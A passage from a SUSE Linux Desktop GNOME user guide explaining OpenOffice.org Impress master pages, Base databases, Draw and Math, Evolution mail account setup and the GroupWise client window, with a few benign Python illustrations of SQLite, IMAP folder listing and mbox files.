Impress uses styles and templates the same way other OpenOffice.org modules do. See Section 3.2.4, “Using Templates to Format Documents,” on page 76 for more information about templates.
3.4.2 Using Master Pages
Master pages give your presentation a consistent look by defining the way each slide looks, what fonts are used, and other graphical elements. Impress uses two types of master pages:

• Slide master: Determines the formatting and appearance of the slides in your presentation.
• Notes master: Determines the formatting and appearance of the notes in your presentation.

Creating a Slide Master

Impress comes with a collection of preformatted master pages. Eventually, most users will want to customize their presentations by creating their own slide masters.

1 Start Impress, then create a new empty presentation.
2 Click View > Master > Slide Master. This opens the current slide master in Master View.
3 Right-click the left-hand panel, then click New Master.
4 Edit the slide master until it has the desired look.
5 Click Close Master View or View > Normal to return to Normal View.

TIP: When you have created all of the slide masters you want to use in your presentations, you can save them in an Impress template. Then, any time you want to create presentations that use those slide masters, open a new presentation with your template.

Applying a Slide Master

Slide masters can be applied to selected slides or to all slides in the presentation.

1 Open your presentation, then click View > Master > Slide Master.
2 (Optional) If you want to apply the slide master to multiple slides, but not to all slides, select the slides that you want to use that slide master. To select multiple slides, Control-click them in the Slides Pane.
3 In the Task Pane, right-click the master page you want to apply. If you do not see the Task Pane, click View > Task Pane.
4 Apply the slide master by clicking one of the following:
• Apply to All Slides: Applies the selected slide master to all slides in the presentation.
• Apply to Selected Slides: Applies the selected slide master to the current slide, or to any slides you select before applying the slide master. For example, if you want to apply a different slide master to the first slide in a presentation, select that slide, then change to Master View and apply a slide master to that slide.
3.5 Using Databases with Base
OpenOffice.org 2.0 introduces a new database module, Base. Databases created in Base can be used as data sources, such as when creating form letters. It is beyond the scope of this document to detail database design with Base. More information can be found at the sources listed in Section 3.8, “Finding Help and Information About OpenOffice.org,” on page 84.
3.5.1 Creating a Database Using Predefined Options
Base comes with several predefined database fields to help you create a database. The steps in this section are specific to creating an address book using predefined fields, but you can follow the same general steps to use the predefined fields for any of the built-in database options.
The process for creating a database can be broken into several subprocesses:

• “Creating the Database” on page 82
• “Setting Up the Database Table” on page 82
• “Creating a Form” on page 83
• “Modifying the Form” on page 83
• “What’s Next?” on page 83

Creating the Database

First, create the database.

1 Click File > New > Database.
2 Select Create a new database, then click Next.
3 Click Yes, register the database for me to make your database information available to other OpenOffice.org modules, select both check boxes in the bottom half of the dialog, then click Finish.
4 Browse to the directory where you want to save the database, specify a name for the database, then click OK.

Setting Up the Database Table

Next, define the fields you want to use in your database table.

1 In the Table Wizard, click Personal. The Sample tables list changes to show the predefined tables for personal use. If you had clicked Business, the list would contain predefined business tables.
2 In the Sample tables list, click Addresses. The available fields for the predefined address book appear in the Available fields menu.
3 In the Available fields menu, click the fields you want to use in your address book. You can select one item at a time, or you can Shift-click multiple items to select them.
4 Click the single right-arrow to move the selected items to the Selected fields menu. To move all available fields to the Selected fields menu, click the double right-arrow.
5 Use the up-arrow and down-arrow to adjust the order of the selected fields. The fields appear in the table and forms in the order in which they are listed.
6 Click Next.
7 Make sure each of the fields is defined correctly. You can change the field name, type, whether the entry is required, and the maximum length of the field (the number of characters that can be entered in that field). For this example, leave the settings as they are.
8 Click Next.
9 Click Create a primary key, click Automatically add a primary key, click Auto value, then click Next. 10 Accept the default name for the table, select Create a form based on this table, then click Finish.
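The Table Wizard’s choices map onto ordinary SQL. As a rough sketch, an Addresses table with an automatically valued primary key and a required field corresponds to something like the following. The example uses Python’s sqlite3 purely for illustration — Base itself embeds the HSQLDB engine, and the actual column set depends on the fields you selected in the wizard.

```python
import sqlite3

# Model the wizard's output: an auto-valued primary key ("Auto value")
# plus a couple of address fields, one marked as a required entry.
con = sqlite3.connect(":memory:")
con.execute(
    """CREATE TABLE Addresses (
           ID INTEGER PRIMARY KEY AUTOINCREMENT,  -- 'Auto value' key
           FirstName TEXT,
           LastName TEXT NOT NULL                 -- an 'entry required' field
       )"""
)

# Inserting a row without an ID lets the engine assign the key,
# exactly what the wizard's automatic primary key does for you.
con.execute(
    "INSERT INTO Addresses (FirstName, LastName) VALUES (?, ?)",
    ("Ada", "Lovelace"),
)
rows = con.execute("SELECT ID, LastName FROM Addresses").fetchall()
print(rows)  # [(1, 'Lovelace')]
```

Seeing the SQL equivalent makes it clearer why the wizard insists on a primary key: without one, individual records cannot be reliably addressed for editing or deletion.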
Creating a Form

Next, create the form to use when entering data into your address book.

1 In the Form Wizard, click the double right-arrow to move all available fields to the Fields in the form list, then click Next twice.
2 Select how you want to arrange your form, then click Next.
3 Select the option to use the form to display all data and leave all of the check boxes empty, then click Next.
4 Apply a style and field border, then click Next. For this example, accept the default selections.
5 Name the form, select the Modify the form option, then click Finish.

Modifying the Form

After the form has been defined, you can modify the appearance of the form to suit your preferences.

1 Close the form that opened when you finished the previous step.
2 In the main window for your database, right-click the form you want to modify (there should be only one option), then click Edit.
3 Arrange the fields on the form by dragging them to their new locations. For example, move the First Name field so it appears to the right of the Last Name field, then adjust the locations of the other fields to suit your preference.
4 When you have finished modifying the form, save it and close it.

What’s Next?

After you have created your database tables and forms, you are ready to enter your data. You can also design queries and reports to help sort and display the data. Refer to OpenOffice.org online help and other sources listed in Section 3.8, “Finding Help and Information About OpenOffice.org,” on page 84 for additional information about Base.
3.6 Creating Graphics with Draw
Use OpenOffice.org Draw to create graphics and diagrams. You can save your drawings in today’s most common formats and import them into any application that lets you import graphics, including the other OpenOffice.org modules. You can also create Flash versions of your drawings.

The OpenOffice.org documentation contains complete instructions on using Draw. See Section 3.8, “Finding Help and Information About OpenOffice.org,” on page 84 for more information.

To use a Draw graphic in a document:

1 Open Draw, then create the graphic.
2 Save the graphic.
3 Copy the graphic and paste it into the document, or insert the graphic directly from the document.
One particularly useful feature of Draw is the ability to open it from other OpenOffice.org modules so you can create a drawing that is automatically imported into your document.

1 From an OpenOffice.org module (for example, from Writer), click Insert > Object > OLE Object > OpenOffice.org 2.0 Drawing > OK. This opens Draw.
2 Create your drawing.
3 Click in your document, outside the Draw frame.

The drawing is automatically inserted into your document.
3.7 Creating Mathematical Formulas with Math
It is usually difficult to include complex mathematical formulas in your documents. The OpenOffice.org Math equation editor lets you create formulas using operators, functions, and formatting assistants. You can then save those formulas as objects that can be imported into other documents. Math functions can be inserted into other OpenOffice.org documents like any other graphic object. NOTE: Math is not a calculator. The functions it creates are graphical objects. Even if they are imported into Calc, these functions cannot be evaluated.
3.8 Finding Help and Information About OpenOffice.org
OpenOffice.org contains extensive online help. In addition, a large community of users and developers supports it. As a result, it is seldom hard to find help or information about using OpenOffice.org. The following table shows some of the places where you can go for additional information. (Because Web sites often close or their content changes, the information in the following table might not be current when you read it.)
Table 3-5 Where to Get Information About OpenOffice.org
OpenOffice.org online help menu: Extensive help on performing any task in OpenOffice.org

Official OpenOffice.org support page (http://support.openoffice.org/index.html): Manuals, tutorials, user and developer forums, the [email protected] mailing list, FAQs, and much more

OpenOffice.org Migration Guide (oooauthors.org/en/authors/userguide2/migration/OtherMSOFiles_25_June_PK.sxw): Information about migrating to OpenOffice.org from other office suites, including Microsoft Office

Taming OpenOffice.org: Books, news, tips and tricks

OpenOffice.org Macros (oo.php): Extensive information about creating and using macros
4 Evolution: E-Mail and Calendaring

Evolution™ includes several search folders, which let you save searches as though they were ordinary e-mail folders. This chapter introduces you to Evolution and helps you get started using it. For complete information, refer to the Evolution documentation.

• Section 4.1, “Starting Evolution for the First Time,” on page 85
• Section 4.2, “Using Evolution: An Overview,” on page 93
4.1 Starting Evolution for the First Time
Start the Evolution client by clicking Computer > Evolution Mail and Calendar, or by typing evolution in a terminal window.
4.1.1 Using the First-Run Assistant
The first time you run Evolution, it creates a directory called .evolution in your home directory, where it stores all of its local data. Then, it opens a First-Run Assistant to help you set up e-mail accounts and import data from other applications. Using the First-Run Assistant takes two to five minutes.

Later on, if you want to change this account, or if you want to create a new one, click Edit > Preferences, then click Mail Accounts. Select the account you want to change, then click Edit. Alternately, add a new account by clicking Add.

The First-Run Assistant helps you provide the information Evolution needs to get started.

• “Defining Your Identity” on page 86
• “Receiving Mail” on page 86
• “Receiving Mail Options” on page 88
• “Sending Mail” on page 91
• “Account Management” on page 92
• “Time Zone” on page 92
• “Importing Mail (Optional)” on page 92
Defining Your Identity

The Identity window is the first step in the assistant. Here, you enter some basic personal information. You can define multiple identities later by clicking Edit > Preferences, then clicking Mail Accounts.

When the First-Run Assistant starts, the Welcome page is displayed. Click Forward to proceed to the Identity window.

1 Type your full name in the Full Name field.
2 Type your e-mail address in the E-Mail Address field.
3 (Optional) Type a reply-to address in the Reply-To field. Use this field if you want replies to your e-mails sent to a different address.
4 (Optional) Select if this account is your default account.
5 (Optional) Type your organization name in the Organization field. This is the company where you work, or the organization you represent when you send e-mail.
6 Click Forward.

Receiving Mail

The Receiving E-mail option lets you determine where you get your e-mail. You need to specify the type of server you want to receive mail with. If you are unsure about the type of server to choose, ask your system administrator or ISP.

1 Select a server type in the Server Type list.

The following server types are available:

Novell GroupWise: Select this option if you connect to Novell GroupWise®. Novell GroupWise keeps e-mail, calendar, and contact information on the server.

Microsoft Exchange: Available only if you have installed the Connector for Microsoft Exchange. It allows you to connect to a Microsoft Exchange 2000 or 2003 server, which stores e-mail, calendar, and contact information on the server.

IMAP: Keeps the e-mail on your server so you can access your e-mail from multiple systems.

IMAP4rev1: Keeps the e-mail on your server so you can access your e-mail from multiple systems.

POP: Downloads your e-mail to your hard disk for permanent storage, freeing up space on the e-mail server.

USENET News: Connects to the news server and downloads a list of available news digests.
Local Delivery: Choose this option if you want to move e-mail from the spool (the location where mail waits for delivery) and store it in your home directory. You need to provide the path to the mail spool you want to use. If you want to leave e-mail in your system’s spool files, choose the Standard Unix Mbox Spool option instead.
MH Format Mail Directories: If you download your e-mail using mh or another MH-style program, you should use this option. You need to provide the path to the mail directory you want to use.

Maildir Format Mail Directories: If you download your e-mail using Qmail or another maildir-style program, you should use this option. You need to provide the path to the mail directory you want to use.

Standard Unix Mbox Spool or Directory: If you want to read and store e-mail in the mail spool on your local system, choose this option. You need to provide the path to the mail spool you want to use.

None: Select this option if you do not plan to check e-mail with this account. If you select it, there are no configuration options.

Remote Configuration Options

If you selected Novell GroupWise, IMAP, POP, or USENET News as your server, you need to specify additional information.

1 Type the hostname of your e-mail server in the Hostname field. If you don’t know the hostname, contact your administrator.
2 Type your username for the account in the Username field.
3 Select whether to use a secure (SSL) connection. If your server supports secure connections, you should enable this security option. If you are unsure whether your server supports a secure connection, contact your system administrator.
4 Select your authentication type in the Authentication list.
or
Click Check for Supported Types to have Evolution check for supported types. Some servers do not announce the authentication mechanisms they support, so clicking this button is not a guarantee that available mechanisms actually work. If you are unsure what authentication type you need, contact your system administrator.
5 Select if you want Evolution to remember your password.
6 Click Forward.
7 (Conditional) If you chose Microsoft Exchange, provide your username in the Username field and your Outlook Web Access (OWA) URL in the OWA URL field. OWA URLs and usernames should be entered as in OWA.
If the mailbox path is different from the username, the OWA path should also include the mailbox path. You should see something similar to this:

http://<server name>/exchange/<mail box path>

When you have finished, continue with “Receiving Mail Options” on page 88.

Local Configuration Options

If you selected Local Delivery, MH-Format Mail Directories, Maildir-Format Mail Directories, or Standard Unix Mbox Spool or Directory, you must specify the path to the local files in the Path field. Continue with “Receiving Mail Options” on page 88.
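The Local Delivery and Unix Mbox Spool options both work with the standard mbox format: one plain file of concatenated messages that many other tools can read as well. The sketch below uses Python’s mailbox module on a throwaway file in a temporary directory (never point experiments at your real spool) to show the format in action.

```python
import mailbox
import os
import tempfile
from email.message import Message

# Use a scratch mbox file in a temp directory, NOT a real spool.
path = os.path.join(tempfile.mkdtemp(), "demo.mbox")

# Compose a minimal message (example.com is a reserved demo domain).
msg = Message()
msg["From"] = "sender@example.com"
msg["Subject"] = "hello"
msg.set_payload("A message waiting in the spool.")

# Append it to the mbox; flush() writes the file to disk.
box = mailbox.mbox(path)
box.add(msg)
box.flush()
box.close()

# Re-open and read back, the way a mail client scans a spool.
subjects = [m["Subject"] for m in mailbox.mbox(path)]
print(subjects)  # ['hello']
```

The same module also handles the Maildir and MH layouts mentioned above (mailbox.Maildir, mailbox.MH), which is a convenient way to inspect local mail stores outside of Evolution.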
Receiving Mail Options

After you have selected a mail delivery mechanism, you can set some preferences for its behavior.

• “Novell GroupWise Receiving Options” on page 88
• “Microsoft Exchange Receiving Options” on page 88
• “IMAP and IMAP4rev1 Receiving Options” on page 89
• “POP Receiving Options” on page 89
• “USENET News Receiving Options” on page 90
• “Local Delivery Receiving Options” on page 90
• “MH-Format Mail Directories Receiving Options” on page 90
• “Maildir-Format Mail Directories Receiving Options” on page 90
• “Standard Unix Mbox Spool or Directory Receiving Options” on page 91

Novell GroupWise Receiving Options

If you select Novell GroupWise as your receiving server type, you need to specify the following options:

1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages.
2 Select if you want to check for new messages in all folders.
3 Select if you want to apply filters to new messages in the Inbox on the server.
4 Select if you want to check new messages for junk content.
5 Select if you want to check for junk messages only in the Inbox folder.
6 Select if you want to automatically synchronize remote mail locally.
7 Type your Post Office Agent SOAP port in the Post Office Agent SOAP Port field. If you are unsure what your Post Office Agent SOAP port is, contact your system administrator.
8 Click Forward.

When you have finished, continue with Sending Mail.

Microsoft Exchange Receiving Options

If you select Microsoft Exchange as your receiving server type, you need to specify the following options:

1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages.
2 Specify the Global Catalog server name in the Global Catalog Server Name field. The Global Catalog server contains the user information for users.
If you are unsure what your Global Catalog server name is, contact your system administrator. 3 Select if you want to limit the number of Global Address Lists (GAL).
SUSE Linux Enterprise Desktop 10 GNOME User Guide
The GAL contains a list of all e-mail addresses. If you select this option, you need to specify the maximum number of responses.
4 Select if you want a password expiration warning. If you select this option, you need to specify how often Evolution should display the password expiration message.
5 Select if you want to automatically synchronize remote mail locally.
6 Click Forward.

When you have finished, continue with Sending Mail.

IMAP and IMAP4rev1 Receiving Options

If you select IMAP or IMAP4rev1 as your receiving server type, you need to specify the following options:

1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages.
2 Select if you want Evolution to use custom commands to connect to the server. If you select this option, specify the custom command you want Evolution to use.
3 Select if you want Evolution to show only subscribed folders. Subscribed folders are folders that you have chosen to receive mail from by subscribing to them.
4 Select if you want Evolution to override server-supplied folder namespaces. By choosing this option, you can rename the folders that the server provides. If you select this option, you need to specify the namespace to use.
5 Select if you want to apply filters to new messages in the Inbox.
6 Select if you want to check new messages for junk content.
7 Select if you want to check for junk messages only in the Inbox folder.
8 Select if you want to automatically synchronize remote mail locally.
9 Click Forward.

When you have finished, continue with Sending Mail.

POP Receiving Options

If you select POP as your receiving server type, you need to specify the following options:

1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages.
2 Select if you want to leave messages on the server.
3 Select if you want to disable support for all POP3 extensions.
4 Click Forward.

When you have finished, continue with Sending Mail.
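The IMAP option to show only subscribed folders corresponds to the IMAP LSUB command, which lists just the folders an account has subscribed to. As a rough sketch (not Evolution's own code), Python's standard imaplib can issue the same command; the host name and credentials below are placeholders:

```python
import imaplib

def subscribed_folders(host, user, password):
    """List only subscribed IMAP folders (the LSUB command),
    mirroring Evolution's "show only subscribed folders" option."""
    with imaplib.IMAP4_SSL(host) as imap:
        imap.login(user, password)
        # LSUB returns subscribed folders; LIST would return every folder.
        typ, data = imap.lsub()
        return [line.decode() for line in data if line]

# Hypothetical usage; "imap.example.com" and the credentials are placeholders:
# for folder in subscribed_folders("imap.example.com", "user", "secret"):
#     print(folder)
```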
USENET News Receiving Options

If you select USENET News as your receiving server type, you need to specify the following options:

1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages.
2 Select if you want to show folders in short notation. For example, comp.os.linux would appear as c.o.linux.
3 Select if you want to show relative folder names in the subscription dialog box. If you select this option, only the name of the folder is displayed. For example, the folder evolution.mail would appear as evolution.
4 Click Forward.

When you have finished, continue with Sending Mail.

Local Delivery Receiving Options

If you select Local Delivery as your receiving server type, you need to specify the following options:

1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages.
2 Click Forward.

When you have finished, continue with Sending Mail.

MH-Format Mail Directories Receiving Options

If you select MH-Format Mail Directories as your receiving server type, you need to specify the following options:

1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages.
2 Select if you want to use the .folders summary file.
3 Click Forward.

When you have finished, continue with Sending Mail.

Maildir-Format Mail Directories Receiving Options

If you select Maildir-Format Mail Directories as your receiving server type, you need to specify the following options:

1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages.
2 Select if you want to apply filters to new messages in the Inbox.
3 Click Forward.

When you have finished, continue with Sending Mail.

Standard Unix Mbox Spool or Directory Receiving Options

If you select Standard Unix Mbox Spool or Directory as your receiving server type, you need to specify the following options:

1 Select if you want Evolution to automatically check for new mail. If you select this option, you need to specify how often Evolution should check for new messages.
2 Select if you want to apply filters to new messages in the Inbox.
3 Select if you want to store status headers in Elm, Pine, and Mutt formats.
4 Click Forward.

When you have finished, continue with Sending Mail.

Sending Mail

Now that you have entered information about how you plan to get mail, Evolution needs to know how you want to send it.

1 Select a server type from the Server Type list. SMTP sends mail using an outbound mail server and is the most common choice for sending mail. If you choose SMTP, there are additional configuration options.

SMTP Configuration

1 Type the host address in the Host field. If you are unsure what your host address is, contact your system administrator.
2 Select if your server requires authentication. If you selected that your server requires authentication, you need to provide the following information:
2a Select your authentication type in the Authentication list, or click Check for Supported Types to have Evolution check for supported types. Some servers do not announce the authentication mechanisms they support, so clicking this button is not a guarantee that available mechanisms actually work.
2b Type your username in the Username field.
2c Select if you want Evolution to remember your password.
3 Select if you use a secure connection (SSL).
4 Click Forward.

Continue with Account Management.

Account Management

Now that you have finished the e-mail configuration process, you need to give the account a name. The name can be any name you prefer. Type your account name in the Name field, then click Forward. Continue with Time Zone.

Time Zone

In this step, select your time zone either on the map or from the time zone drop-down list. When you have finished, click Forward, then click Apply. Evolution opens with your new account created.

If you want to import e-mail from another e-mail client, continue with Importing Mail (Optional). If not, skip to “Using Evolution: An Overview” on page 93.

Importing Mail (Optional)

If Evolution finds e-mail or address files from another application, it offers to import them. Microsoft Outlook* and versions of Outlook Express after version 4 use proprietary formats that Evolution cannot read or import. To import information, you might want to use the Export tool under Windows*.

Before importing e-mail from Netscape*, make sure you have selected File > Compact All Folders. If you don’t, Evolution will import and undelete the messages in your Trash folders.

NOTE: Evolution uses standard file types for e-mail and calendar information, so you can copy those files from your ~/.evolution directory. The file formats used are mbox for e-mail and iCal for calendar information. Contacts files are stored in a database, but can be saved as a standard vCard*. To export contact data, open your contacts tool and select the contacts you want to export (press Ctrl+A to select them all). Click File > Save as VCard.
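Because Evolution stores local mail in the standard mbox format, other tools can read those files directly. As an illustrative sketch (not Evolution code — the file name below is hypothetical; real folders live under ~/.evolution), Python's standard mailbox module writes and reads the same format:

```python
import mailbox
from email.message import EmailMessage

# Hypothetical file name for illustration.
path = "demo.mbox"

# Build a minimal message and store it in mbox format.
msg = EmailMessage()
msg["From"] = "alice@example.com"
msg["To"] = "bob@example.com"
msg["Subject"] = "Hello"
msg.set_content("A minimal test message.")

box = mailbox.mbox(path)  # the file is created on first use
box.add(msg)
box.flush()
box.close()

# Each stored message exposes its RFC 822 headers by name.
for m in mailbox.mbox(path):
    print(m["From"], "->", m["Subject"])  # alice@example.com -> Hello
```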
4.2 Using Evolution: An Overview
Now that the first-run configuration has finished, you’re ready to begin using Evolution. Here’s a quick explanation of what’s happening in your main Evolution window.
Figure 4-1 Evolution Window
Menu Bar

The menu bar gives you access to nearly all of Evolution’s features.

Folder List

The folder list shows the available folders for each account. To see the contents of a folder, click the folder name; the contents are displayed in the e-mail list.

Toolbar

The toolbar gives you fast and easy access to the frequently used features in each component.

Search Tool

The search tool lets you search your e-mail, contacts, calendar, and tasks to easily find what you’re looking for.

Message List

The message list displays a list of the e-mail that you have received. To view an e-mail in the preview pane, click the e-mail in the e-mail list.
Shortcut Buttons

The shortcut bar lets you switch between folders and between Evolution tools. At the bottom of the shortcut bar there are buttons that let you switch tools, and above that is a list of all the available folders for the current tool. If you have the Evolution Connector for Microsoft Exchange installed, you have an Exchange button in addition to buttons for the other tools.

Status Bar

The status bar periodically displays a message, or tells you the progress of a task. This most often happens when you’re checking or sending e-mail. These progress queues are shown in the previous figure. The Online/Offline indicator is here, too, in the lower left of the window.

Preview Pane

The preview pane displays the contents of the e-mail that is selected in the e-mail list.
4.2.1 The Menu Bar
The menu bar’s contents always provide all the possible actions for any given view of your data. If you’re looking at your Inbox, most of the menu items relate to e-mail. Some content relates to other components of Evolution, and some, especially those in the File menu, relate to the application as a whole.

File: Anything related to a file or to the operations of the application usually falls under this menu, such as creating things, saving them to disk, printing them, and quitting the program itself.

Edit: Holds useful tools that help you edit text and move it around. Also lets you access settings and configuration options.

View: Lets you decide how Evolution should look. Some of the features control the appearance of Evolution as a whole, and others the way a particular kind of information appears.

Folder: Holds actions that can be performed on folders, such as copy, rename, and delete.

Message: Holds actions that can be applied to a message. If there is only one target for the action, such as replying to a message, you can normally find it in the Message menu.

Search: Lets you search for messages, or for phrases within a message. You can also see previous searches you have made. In addition to the Search menu, there is a text entry box in the toolbar that you can use to search for messages. You can also create a search folder from a search.

Help: Opens the Evolution Help files.
4.2.2 The Shortcut Bar
Evolution’s most important job is to give you access to your information and help you use it quickly. One way it does that is through the shortcut bar, which is the column on the left side of the main window. The buttons, such as Mail and Contacts, are the shortcuts. Above them is a list of folders for the current Evolution tool. The folder list organizes your e-mail, calendars, contact lists, and task lists in a tree, similar to a file tree. Most people find one to four folders at the base of the tree, depending on the tool and their
system configuration. Each Evolution tool has at least one folder, called On This Computer, for local information. For example, the folder list for the e-mail tool shows any remote e-mail storage you have set up, plus local folders and search folders. If you get large amounts of e-mail, you might want more folders than just your Inbox. You can also create multiple calendar, task, or contacts folders.

To create a new folder:

1 Click Folder > New.
2 Type the name of the folder in the Folder Name field.
3 Select the location of the new folder.
4 Click OK.

Folder Management

Right-click a folder or subfolder to display a menu with the following options:

Copy: Copies the folder to a different location. When you select this item, Evolution offers a choice of locations to copy the folder to.

Move: Moves the folder to another location.

Mark Messages As Read: Marks all the messages in the folder as read.

New Folder: Creates another folder in the same location.

Delete: Deletes the folder and all its contents.

Rename: Lets you change the name of the folder.

Disable: Disables the account.

Properties: Displays the number of total and unread messages in a folder and, for remote folders, lets you select whether to copy the folder to your local system for offline operation.

You can also rearrange folders and messages by dragging and dropping them.

Any time new e-mail arrives in an e-mail folder, that folder label is displayed in bold text, along with the number of new messages in that folder.
4.2.3 E-Mail
Evolution e-mail is like other e-mail programs in several ways:

• It can send and receive e-mail in HTML or as plain text, and makes it easy to send and receive multiple file attachments.
• It supports multiple e-mail sources, including IMAP, POP3, and local mbox or mh spools and files created by other e-mail programs.
• It can sort and organize your e-mail in a wide variety of ways with folders, searches, and filters.
• It lets you guard your privacy with encryption.

However, Evolution has some important differences from other e-mail programs. First, it’s built to handle very large amounts of e-mail. The junk e-mail, message filtering, and searching functions
were built for speed and efficiency. There’s also the search folder, an advanced organizational feature not found in some e-mail clients. If you get a lot of e-mail, or if you keep every message you get in case you need to refer to it later, you’ll find this feature especially useful. Here’s a quick explanation of what’s happening in your main Evolution e-mail window.

Message List

The message list displays all the e-mail that you have. This includes all your read and unread messages, and e-mail that is flagged to be deleted.

Preview Pane

The preview pane displays the selected message and lets you act on messages, including moving or deleting them, creating filters or search folders based on them, and marking them as junk mail.

Most of the e-mail-related actions you want to perform are listed in the Actions menu in the menu bar. The most frequently used ones, like Reply and Forward, also appear as buttons in the toolbar. Most of them are also located in the right-click menu and as keyboard shortcuts.
4.2.4 The Calendar
To begin using the calendar, click Calendar in the shortcut bar. By default, the calendar shows today’s schedule on a ruled background. At the upper right, there’s a monthly calendar you can use to switch days. Below that, there’s a Task list, where you can keep a list of tasks separate from your calendar appointments.

Appointment List

The appointment list displays all your scheduled appointments.

Month Pane

The month pane is a small view of a calendar month. To display additional months, drag the column border to the left. You can also select a range of days in the month pane to display a custom range of days in the appointment list.

Task List

Tasks are distinct from appointments because they generally don’t have times associated with them. You can see a larger view of your task list by clicking Tasks in the shortcut bar.
4.2.5 The Contacts Tool
The Evolution contacts tool can handle all of the functions of an address book or phone book. However, it’s easier to update Evolution than it is to change an actual paper book, in part because Evolution can synchronize with Palm OS* devices and use LDAP directories on a network.
Another advantage of the Evolution contacts tool is its integration with the rest of the application. For example, you can right-click on an e-mail address in Evolution mail to instantly create a contact entry. To use the contacts tool, click Contacts in the shortcut bar. By default, the display shows all your contacts in alphabetical order, in a minicard view. You can select other views from the View menu, and adjust the width of the columns by clicking and dragging the gray column dividers. The largest section of the contacts display shows a list of individual contacts. You can also search the contacts in the same way that you search e-mail folders, using the search tool on the right side of the toolbar.
GroupWise Linux Client: E-Mailing and Calendaring
GroupWise® is a robust, dependable messaging and collaboration system that connects you to your universal mailbox anytime and anywhere. This section gives you an introductory overview of the GroupWise client to help you start using the GroupWise Cross-Platform client quickly and easily.

• Section 5.1, “Getting Acquainted with the Main GroupWise Window,” on page 99
• Section 5.2, “Using Different GroupWise Modes,” on page 104
• Section 5.3, “Understanding Your Mailbox,” on page 105
• Section 5.4, “Using the Toolbar,” on page 107
• Section 5.5, “Using Shortcut Keys,” on page 107
• Section 5.6, “Learning More,” on page 109
5.1 Getting Acquainted with the Main GroupWise Window
Your main work area in GroupWise is called the Main Window. From the Main Window of GroupWise, you can read your messages, schedule appointments, view your Calendar, manage
contacts, change the mode of GroupWise you’re running in, open folders, open documents, and much more.
Figure 5-1 GroupWise Main Window
You can open more than one Main Window in GroupWise by clicking Window, then clicking New Main Window. This is useful if you proxy for another user. You can look at your own Main Window and the Main Window belonging to the person you are proxying for. You might also want to open a certain folder in one window and look at your Calendar in another. You can open as many Main Windows as your computer’s memory allows. The basic components of the Main Window are explained below.
5.1.1 Toolbar
The toolbar lets you quickly accomplish common GroupWise tasks, such as opening the Address Book, sending mail messages, and finding an item. For information about the toolbar, see Section 5.4, “Using the Toolbar,” on page 107.
5.1.2 Folder and Item List Header
The Folder and Item List header provides a drop-down list where you can select the mode of GroupWise you want to run (Online or Caching), select to open your archived or backup mailbox, and select a proxy mailbox.
5.1.3 Folder List
The Folder List at the left of the Main Window lets you organize your GroupWise items. You can create new folders to store your items in. Next to any folder (except for shared folders), the number of unread items is shown in square brackets. Next to the Sent Items folder, the number in square brackets shows how many items are pending to be sent from Caching mode.

Here is what you’ll find in each of the default folders:

• “User Folder” on page 101
• “Mailbox Folder” on page 101
• “Sent Items Folder” on page 101
• “Calendar Folder” on page 102
• “Contacts Folder” on page 102
• “Checklist Folder” on page 102
• “Documents Folder” on page 103
• “Trash Folder” on page 103
• “Shared Folders” on page 103

User Folder

Your user folder (indicated by your name) represents your GroupWise database. All folders in your Main Window are subfolders of your user folder.

Mailbox Folder

The Mailbox displays all the items you have received, with the exception of scheduled items (appointments, tasks, and reminder notes) you have accepted or declined. Accepted scheduled items are moved to the Calendar.

Sent Items Folder

The Sent Items folder displays all sent items from the Mailbox and Calendar. The Sent Items folder in versions prior to GroupWise 6.5 was a query folder, which had some differences from the current Sent Items folder. The following is a comparison between the previous Sent Items query folder and the current Sent Items folder.
Table 5-1 Comparison Between Sent Items Query Folder and Sent Items Folder

Sent Items Folder (Current):
• All sent items reside in this folder unless they are moved to a folder other than the Mailbox or Calendar. If a sent item is moved to another folder, it no longer displays in the Sent Items folder.
• You can resend, reschedule, and retract sent items from this folder.

Sent Items Query Folder (Previous):
• No items actually reside in this folder. This folder is a Find Results folder, which means a Find is performed when you click the folder, and the results of the Find (all sent items) are displayed in the folder. If you delete an item from this folder, the original item remains in its original folder and redisplays the next time you open this folder.
• You can resend, reschedule, and retract sent items from this folder.
Calendar Folder

The Calendar folder shows several calendar view options.

Contacts Folder

The Contacts folder, by default, represents the Frequent Contacts address book in the Address Book. Any modification you make in the Contacts folder is also made in the Frequent Contacts address book. From this folder, you can view, create, and modify contacts, resources, organizations, and groups. Your proxies never see your Contacts folder.

Checklist Folder

Use the Checklist folder to create a task list. You can move any items (mail messages, phone messages, reminder notes, tasks, or appointments) to this folder and arrange them in the order you want. Each item is marked with a check box so that you can check items off as you complete them. The following is a comparison between the Checklist folder and the Task List query folder (found in previous versions of GroupWise).

Table 5-2 Comparison Between Checklist Folder and Task List Folder

Checklist Folder:
• This folder contains items you have moved to it, items you have posted to it, and items that are part of a checklist you have created in another folder.
• Any item type can reside in this folder.
• To mark an item completed, click the check box next to the item in the Item List.
• Checklist items do not display in the Task List of the Calendar.

Task List Folder:
• No items actually reside in this folder. This folder is a Find Results folder, which means a Find is performed when you click the folder, and the results of the Find (all scheduled tasks) are displayed in the folder. If you delete an item from this folder, the original item remains in its original folder and redisplays the next time you open this folder.
• Only tasks show in this folder. Tasks are scheduled items that are associated with a due date. Due dates are set by the person who sent you the task. If you post a task for yourself, you can set a due date.
• To mark an item completed, open the item, then click Completed. To set the priority of an item, open the item, then type a priority in the Priority field.
• Tasks display in the Task List of the Calendar and can be marked Completed from the Calendar. Tasks that are past due show as red in the Calendar.

Documents Folder

Your document references are organized in the Documents folder so you can locate them easily. The Documents folder can contain only documents. If any other type of item is moved to this folder by a GroupWise client older than version 5.5, the item is deleted.

Cabinet Folder

The Cabinet contains all your personal folders. You can rearrange and nest folders by clicking Edit > Folders. You can change how the folders are sorted by right-clicking the Cabinet folder, clicking Properties, then selecting what you want to sort by.

Junk Mail Folder

